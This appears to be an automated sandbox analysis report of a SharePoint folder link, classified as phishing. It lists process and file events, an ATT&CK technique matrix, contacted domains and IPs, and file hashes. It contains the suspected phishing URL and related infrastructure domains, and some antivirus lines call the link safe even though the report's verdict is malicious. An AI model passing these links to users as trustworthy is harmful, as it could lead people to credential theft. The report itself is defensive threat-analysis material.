          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
          Source: Window RecorderWindow detected: More than 3 window changes detected
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk
          ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
          Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
          Registry Run Keys / Startup Folder
          1
          Process Injection
          1
          Masquerading
          OS Credential DumpingSystem Service DiscoveryRemote ServicesData from Local System2
          Encrypted Channel
          Exfiltration Over Other Network MediumAbuse Accessibility Features
          CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
          Registry Run Keys / Startup Folder
          1
          Process Injection
          LSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media1
          Non-Application Layer Protocol
          Exfiltration Over BluetoothNetwork Denial of Service
          Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive2
          Application Layer Protocol
          Automated ExfiltrationData Encrypted for Impact

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          windows-stand
          SourceDetectionScannerLabelLink
          https://timecusa-my.sharepoint.com/:f:/p/stephensw/Erq5TMDIJBVBvh6vbWmpurEB4UwHKTW8nzSkPE2Ckmvugg?e=SepTcT0%Avira URL Cloudsafe
          No Antivirus matches
          No Antivirus matches
          No Antivirus matches
          No Antivirus matches
          NameIPActiveMaliciousAntivirus DetectionReputation
          ooc-g2.tm-4.office.com
          52.98.253.162
          truefalse
            high
            dual-spo-0005.spo-msedge.net
            13.107.136.10
            truefalse
              high
              challenges.cloudflare.com
              104.18.94.41
              truefalse
                high
                s-part-0017.t-0009.t-msedge.net
                13.107.246.45
                truefalse
                  high
                  www.google.com
                  142.250.185.228
                  truefalse
                    high
                    bc5d8028.26e125934b57cd512fa70e06.workers.dev
                    172.67.216.174
                    truefalse
                      unknown
                      HHN-efz.ms-acdc.office.com
                      52.98.243.34
                      truefalse
                        high
                        FRA-efz.ms-acdc.office.com
                        52.97.189.66
                        truefalse
                          unknown
                          avaraconstructions.com
                          147.45.179.216
                          truefalse
                            unknown
                            totaipower.ca
                            147.45.179.216
                            truefalse
                              unknown
                              www.office.com
                              unknown
                              unknownfalse
                                high
                                r4.res.office365.com
                                unknown
                                unknownfalse
                                  high
                                  422718faef08a4348271976955cfa06a.fp.measure.office.com
                                  unknown
                                  unknownfalse
                                    unknown
                                    timecusa-my.sharepoint.com
                                    unknown
                                    unknownfalse
                                      unknown
                                      m365cdn.nel.measure.office.net
                                      unknown
                                      unknownfalse
                                        high
                                        spo.nel.measure.office.net
                                        unknown
                                        unknownfalse
                                          high
                                          outlook.office365.com
                                          unknown
                                          unknownfalse
                                            high
                                            identity.nel.measure.office.net
                                            unknown
                                            unknownfalse
                                              high
                                              upload.fp.measure.office.com
                                              unknown
                                              unknownfalse
                                                high
                                                config.fp.measure.office.com
                                                unknown
                                                unknownfalse
                                                  high
                                                  login.microsoftonline.com
                                                  unknown
                                                  unknownfalse
                                                    high
                                                    tr-ooc-acdc.office.com
                                                    unknown
                                                    unknownfalse
                                                      high
                                                      NameMaliciousAntivirus DetectionReputation
                                                      https://timecusa-my.sharepoint.com/personal/stephensw_timecusa_com/_layouts/15/onedrive.aspx?id=%2Fpersonal%2Fstephensw%5Ftimecusa%5Fcom%2FDocuments%2FBenefit%20Policy&ga=1false
                                                        unknown
                                                        about:blankfalse
                                                          high
                                                          https://bc5d8028.26e125934b57cd512fa70e06.workers.dev/false
                                                            unknown
                                                            • No. of IPs < 25%
                                                            • 25% < No. of IPs < 50%
                                                            • 50% < No. of IPs < 75%
                                                            • 75% < No. of IPs
                                                            IPDomainCountryFlagASNASN NameMalicious
                                                            13.107.6.156
                                                            unknownUnited States
                                                            8068MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                            95.100.110.77
                                                            unknownEuropean Union
                                                            20940AKAMAI-ASN1EUfalse
                                                            142.250.185.228
                                                            www.google.comUnited States
                                                            15169GOOGLEUSfalse
                                                            13.107.136.10
                                                            dual-spo-0005.spo-msedge.netUnited States
                                                            8068MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                            172.67.216.174
                                                            bc5d8028.26e125934b57cd512fa70e06.workers.devUnited States
                                                            13335CLOUDFLARENETUSfalse
                                                            2.21.65.207
                                                            unknownEuropean Union
                                                            20940AKAMAI-ASN1EUfalse
                                                            13.107.246.45
                                                            s-part-0017.t-0009.t-msedge.netUnited States
                                                            8068MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                            20.189.173.4
                                                            unknownUnited States
                                                            8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                            104.18.94.41
                                                            challenges.cloudflare.comUnited States
                                                            13335CLOUDFLARENETUSfalse
                                                            2.16.168.122
                                                            unknownEuropean Union
                                                            20940AKAMAI-ASN1EUfalse
                                                            20.189.173.1
                                                            unknownUnited States
                                                            8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                            142.250.185.100
                                                            unknownUnited States
                                                            15169GOOGLEUSfalse
                                                            2.16.168.124
                                                            unknownEuropean Union
                                                            20940AKAMAI-ASN1EUfalse
                                                            147.45.179.216
                                                            avaraconstructions.comRussian Federation
                                                            2895FREE-NET-ASFREEnetEUfalse
                                                            2.19.126.146
                                                            unknownEuropean Union
                                                            16625AKAMAI-ASUSfalse
                                                            172.217.23.110
                                                            unknownUnited States
                                                            15169GOOGLEUSfalse
                                                            52.98.171.226
                                                            unknownUnited States
                                                            8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                            2.19.126.143
                                                            unknownEuropean Union
                                                            16625AKAMAI-ASUSfalse
                                                            23.57.23.230
                                                            unknownUnited States
                                                            16625AKAMAI-ASUSfalse
                                                            52.98.243.34
                                                            HHN-efz.ms-acdc.office.comUnited States
                                                            8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                            52.97.189.66
                                                            FRA-efz.ms-acdc.office.comUnited States
                                                            8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                            20.189.173.18
                                                            unknownUnited States
                                                            8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                            104.21.37.252
                                                            unknownUnited States
                                                            13335CLOUDFLARENETUSfalse
                                                            52.113.194.132
                                                            unknownUnited States
                                                            8068MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                            40.126.32.134
                                                            unknownUnited States
                                                            8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                            1.1.1.1
                                                            unknownAustralia
                                                            13335CLOUDFLARENETUSfalse
                                                            74.125.133.84
                                                            unknownUnited States
                                                            15169GOOGLEUSfalse
                                                            216.58.206.67
                                                            unknownUnited States
                                                            15169GOOGLEUSfalse
                                                            142.250.185.234
                                                            unknownUnited States
                                                            15169GOOGLEUSfalse
                                                            2.16.168.112
                                                            unknownEuropean Union
                                                            20940AKAMAI-ASN1EUfalse
                                                            104.18.95.41
                                                            unknownUnited States
                                                            13335CLOUDFLARENETUSfalse
                                                            2.16.168.113
                                                            unknownEuropean Union
                                                            20940AKAMAI-ASN1EUfalse
                                                            13.107.6.163
                                                            unknownUnited States
                                                            8068MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                            13.107.42.16
                                                            unknownUnited States
                                                            8068MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                            52.97.229.146
                                                            unknownUnited States
                                                            8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                            2.19.126.84
                                                            unknownEuropean Union
                                                            16625AKAMAI-ASUSfalse
                                                            52.98.253.162
                                                            ooc-g2.tm-4.office.comUnited States
                                                            8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                            239.255.255.250
                                                            unknownReserved
                                                            unknownunknownfalse
                                                            142.250.185.174
                                                            unknownUnited States
                                                            15169GOOGLEUSfalse
                                                            142.250.185.131
                                                            unknownUnited States
                                                            15169GOOGLEUSfalse
                                                            104.208.16.88
                                                            unknownUnited States
                                                            8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                            40.126.32.138
                                                            unknownUnited States
                                                            8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                            IP
                                                            192.168.2.16
                                                            Joe Sandbox version:42.0.0 Malachite
                                                            Analysis ID:1590259
                                                            Start date and time:2025-01-13 20:47:55 +01:00
                                                            Joe Sandbox product:CloudBasic
                                                            Overall analysis duration:
                                                            Hypervisor based Inspection enabled:false
                                                            Report type:full
                                                            Cookbook file name:defaultwindowsinteractivecookbook.jbs
                                                            Sample URL:https://timecusa-my.sharepoint.com/:f:/p/stephensw/Erq5TMDIJBVBvh6vbWmpurEB4UwHKTW8nzSkPE2Ckmvugg?e=SepTcT
                                                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                            Number of analysed new started processes analysed:13
                                                            Number of new started drivers analysed:0
                                                            Number of existing processes analysed:0
                                                            Number of existing drivers analysed:0
                                                            Number of injected processes analysed:0
                                                            Technologies:
                                                            • EGA enabled
                                                            Analysis Mode:stream
                                                            Analysis stop reason:Timeout
                                                            Detection:MAL
                                                            Classification:mal48.phis.win@21/126@78/413
                                                            • Exclude process from analysis (whitelisted): svchost.exe
                                                            • Excluded IPs from analysis (whitelisted): 216.58.206.67, 172.217.23.110, 74.125.133.84, 142.250.184.206, 2.19.126.84, 2.19.126.89, 142.250.186.110, 23.57.23.230, 2.16.168.122, 2.16.168.121, 2.16.168.112, 2.16.168.113, 2.16.168.103, 199.232.210.172
                                                            • Excluded domains from analysis (whitelisted): accounts.google.com, ctldl.windowsupdate.com, clientservices.googleapis.com, res-1.cdn.office.net, e19254.dscg.akamaiedge.net, a1894.dscb.akamai.net, shell.cdn.office.net-c.edgekey.net.globalredir.akadns.net, res-stls-prod.edgesuite.net, shell.cdn.office.net-c.edgekey.net, res-prod.cdn.office.net.akadns.net, clients2.google.com, redirector.gvt1.com, nel.measure.office.net.edgesuite.net, a726.dscd.akamai.net, 201343-ipv4v6e.farm.dprodmgd108.sharepointonline.com.akadns.net, shell.cdn.office.net, clients.l.google.com
                                                            • Not all processes where analyzed, report is missing behavior information
                                                            • VT rate limit hit for: https://timecusa-my.sharepoint.com/:f:/p/stephensw/Erq5TMDIJBVBvh6vbWmpurEB4UwHKTW8nzSkPE2Ckmvugg?e=SepTcT
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Mon Jan 13 18:48:26 2025, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                            Category:dropped
                                                            Size (bytes):2673
                                                            Entropy (8bit):3.9842678064482855
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:2FC110F62823BF55A1983283125535CF
                                                            SHA1:136435FB92880B31DF6F4B2A3473A4A4420755B8
                                                            SHA-256:F302E0AC65847CB5CAF6A7E4B7AC8869893C60F96EAF4A4936D20425264FAEF4
                                                            SHA-512:A894A5160008300DFFAEB8AC8BFFFF8B12555009746DE4736514D17A93374D8E94D274EAB93E97E5BFD17FE53FDA2D18C327067A9381BCECA122019988F684C2
                                                            Malicious:false
                                                            Reputation:unknown
                                                            Preview:L..................F.@.. ...$+.,.....m...e..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I-Z......B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V-Z......L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V-Z......M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V-Z............................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V-Z.............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i....................C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Mon Jan 13 18:48:26 2025, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                            Category:dropped
                                                            Size (bytes):2675
                                                            Entropy (8bit):4.00108002266413
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:F63D89110E232A6FE8131030B8A0FEDF
                                                            SHA1:370076C728622838358CD84DCB834E581CBEDDE7
                                                            SHA-256:320F98F0A4050C4BF5211CF41E314B0E4DFA858614F025AEC606C1BA495D9205
                                                            SHA-512:ADBD9ABAC578ECEB328C7DE8BB716659E9214A140D1E35C6B2E348578B8D8AFBDD7829E682147C385D77FB3756CF83233FFB88CA4822E9CF8B95A912C13CDBEC
                                                            Malicious:false
                                                            Reputation:unknown
                                                            Preview:L..................F.@.. ...$+.,.........e..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I-Z......B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V-Z......L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V-Z......M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V-Z............................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V-Z.............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i....................C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Oct 6 08:05:01 2023, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                            Category:dropped
                                                            Size (bytes):2689
                                                            Entropy (8bit):4.009582474321468
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:605D3771F1A3589F063B718738737C7A
                                                            SHA1:A5F3CE8473F245066ED5B7ACC0FEFC7A69C4F262
                                                            SHA-256:3CAAD9E9341CD7B32308F1C4067472A0BC683E4539747F2C6D861ACD7E5B6AC4
                                                            SHA-512:1753B333A29A761D9F0CA8644237458DAA93F9AFF698EEF462418088D22AADD7C3E2694DC4C9FA71D9108648FE8E31B353AEE002F76C6BF5601F6A83E4CD9ED0
                                                            Malicious:false
                                                            Reputation:unknown
                                                            Preview:L..................F.@.. ...$+.,.....Y.04...N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I-Z......B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V-Z......L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V-Z......M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V-Z............................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VFW.E...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i....................C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Mon Jan 13 18:48:26 2025, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                            Category:dropped
                                                            Size (bytes):2677
                                                            Entropy (8bit):3.996653432996053
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:37BB36538B066CA963CD81C41AB3650A
                                                            SHA1:39C469E75606BC71D64360DF5A35C06952EFD534
                                                            SHA-256:17F190958E15C85CD8420CCF5423D9AA6777EC8C386EC2E7B11133A93FD66073
                                                            SHA-512:9A7BC3AFA8AECCC42C3BFC6FE9BADFF41B5C95BE5E4805C3C570F43D9EF92FF9DC72DC8580C171496C7F46518B715B349BF3E5CDD43208E05BF01E6084F5E7B4
                                                            Malicious:false
                                                            Reputation:unknown
                                                            Preview:L..................F.@.. ...$+.,.....p...e..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I-Z......B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V-Z......L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V-Z......M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V-Z............................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V-Z.............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i....................C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Mon Jan 13 18:48:26 2025, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                            Category:dropped
                                                            Size (bytes):2677
                                                            Entropy (8bit):3.9886397888111946
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:D6599B27013F4B852CE0B4639F9F52B3
                                                            SHA1:272AA21C35AC81008B379C087740A9B201133BF9
                                                            SHA-256:BACD2436BF70A2222E78C1AAFBB54D300C7EBD817E2AE813F21CADAB226205E1
                                                            SHA-512:E59A2CAFC9362E804787C42EC99095EC7E1E05E6EA64BFD39938B73F4C4DD9DEF5F2EBEC552E4851367B7F2A3B5C3CE224DB678FAFD52C2BAC812FD585ADF121
                                                            Malicious:false
                                                            Reputation:unknown
                                                            Preview:L..................F.@.. ...$+.,.........e..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I-Z......B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V-Z......L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V-Z......M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V-Z............................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V-Z.............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i....................C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Mon Jan 13 18:48:26 2025, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                            Category:dropped
                                                            Size (bytes):2679
                                                            Entropy (8bit):3.9962401338207205
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:FD8896E6FC3A107625BDB92FD8B0FF86
                                                            SHA1:3F0FC61E0D248A9744B86E84D21EB67DCBE622E8
                                                            SHA-256:BD351E9D2076262FACD1855FD9539DD35BA1F20852D1E219C317F1541CA03616
                                                            SHA-512:6B871B1E71CAE98E7EC4085F28F2DF74B03F316C20B29441156440EA6D9DC0295C03236DB12E36285579729EC1941381CEC3B7E02F93B2281FBCD1802C8980C8
                                                            Malicious:false
                                                            Reputation:unknown
                                                            Preview:L..................F.@.. ...$+.,.....o...e..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I-Z......B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V-Z......L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V-Z......M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V-Z............................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V-Z.............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i....................C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:Unicode text, UTF-8 text, with very long lines (7518)
                                                            Category:dropped
                                                            Size (bytes):30614
                                                            Entropy (8bit):5.411511880269784
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:E1187BD4BF8E674B8C17A48ECCC259A0
                                                            SHA1:C314F918CE6850C1636C6B5F71DA9559A6546D4A
                                                            SHA-256:3982A0D08CB2A2E17F01B64E15A0DDECC2D3C8E07A2DE1816B11CFA3B23B5CEB
                                                            SHA-512:BEDE33817059E4D643FDAF96B8CEC20B4AF39A4B776B7ABE8D0034720405BBAEE6EE990B7B4BC2ACCB15B7B58C8A3EE202773504C29C310DCB25565EE3420113
                                                            Malicious:false
                                                            Reputation:unknown
                                                            Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[74],{2708:function(e,t,n){n.d(t,{a:function(){return l}});var a=n("react-lib"),i=n(143),r=n(142),o=n("fui.core_220"),s=n(162);const c=(0,o.Oz8)({base:{g2u3we:"fj3muxo",h3c5rm:["f1akhkt","f1lxtadh"],B9xav0g:"f1aperda",zhjwy3:["f1lxtadh","f1akhkt"],Beyfa6y:0,Bbmb7ep:0,Btl43ni:0,B7oj6ja:0,Dimara:"f1fabniw",B7ck84d:"f1ewtqcl",mc9l5x:"f14t3ns0"},bordered:{icvyot:"fzkkow9",vrafjx:["fcdblym","fjik90z"],oivjwe:"fg706s2",wvpqe5:["fjik90z","fcdblym"],B4j52fo:"f192inf7",Bekrc4i:["f5tn483","f1ojsxk5"],Bn0qgzm:"f1vxd6vx",ibv6hh:["f1ojsxk5","f5tn483"]},circular:{Beyfa6y:0,Bbmb7ep:0,Btl43ni:0,B7oj6ja:0,Dimara:"f44lkw9"},rounded:{Beyfa6y:0,Bbmb7ep:0,Btl43ni:0,B7oj6ja:0,Dimara:"ft85np5"},square:{},shadow:{E5pizo:"f1whvlc6"},center:{st4lth:"f1plgu50",Ermj5k:"f14xojzb",Bqenvij:"f1l02sjl",a9b677:"fly5x3f"},contain:{st4lth:"f1kle4es",Ermj5k:"f14xojzb",Bqenvij:"f1l02sjl",a9b677:"fly5x3f"},default:{},cover:{st4lth:"f1ps3kmd",Ermj5k
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:ASCII text, with very long lines (29544)
                                                            Category:downloaded
                                                            Size (bytes):35580
                                                            Entropy (8bit):5.3237515608429655
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:D28F09DB5BD8071F523F53896C873525
                                                            SHA1:4B3E61CDFC934E0E8D2F777D4E188534AB9D4B3F
                                                            SHA-256:1E1D7E0CB99DCC13D8FD8DE9282BFA36E690BBA30406724F8F68FC5A77EE0169
                                                            SHA-512:301E83DA7CA57F111D4519D883362F536A53EBFD6D830E5A9DFDAB3AC969DFAA4ED43304A25863E454C3B30614249489224EAC360A981D74B025C14FB92C393D
                                                            Malicious:false
                                                            Reputation:unknown
                                                            URL:https://res-1.cdn.office.net/files/odsp-web-prod_2025-01-03.002/odblightspeedwebpack/48.js
